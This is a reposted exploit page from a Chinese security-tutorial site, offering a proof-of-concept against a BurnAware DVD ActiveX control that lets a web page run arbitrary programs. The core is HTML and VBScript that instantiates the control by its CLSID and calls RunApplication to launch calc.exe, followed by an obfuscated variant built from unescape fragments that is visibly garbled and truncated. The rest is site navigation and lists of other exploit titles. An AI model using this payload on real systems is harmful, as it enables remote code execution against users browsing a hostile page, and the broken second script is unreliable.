• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution

BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution ,其中包含BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution 等知识点,遇到此问题的同学们可以参考下
-----------------------------------------------------------------------------
BurnAware NMSDVDXU ActiveX Control Remote Arbitrary File Creation/Execution
url: http://www.burnaware.com File: NMSDVDXU.dll <= 1.0.0.13
CLSID: {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
ProgID: NMSDVDX.DVDEngineX.1
Descr.: DVDEngineX Class Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7 myMsinfo is just hexadecimal values of: <object classid='clsid:0355854A-7F23-47E2-B7C3-97EE8DD42CD8' id='compatUI'></object>
<script language='vbscript'>
compatUI.RunApplication 1, "calc.exe", 1
</script>
-----------------------------------------------------------------------------
<object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'>
Sub tryMe
myMsinfo = unescape(" unescape("'clsid:0355854A-") & _
unescape("7F23-47E2-B7C3-9") & _
unescape("7EE8DD42CD8' id=") & _
unescape("'compatUI'> unescape("ect>

您可能想查找下面的文章:

相关文章

  • IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
  • Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
  • Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
  • Sun xVM VirtualBox
  • Anzio Web Print Object
  • The Personal FTP Server 6.0f RETR Denial of Service Exploit
  • NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
  • fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)
  • moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
  • Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
    • MS Internet Explorer Recordset Double Free Memory Exploit
    • Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
    • Simple DNS Plus
    • phpDatingClub (website.php page) Local File Inclusion Vulnerability
    • EO Video 1.36 Local Heap Overflow DOS / PoC
    • MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
    • AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
    • PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability
    • GeekLog

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有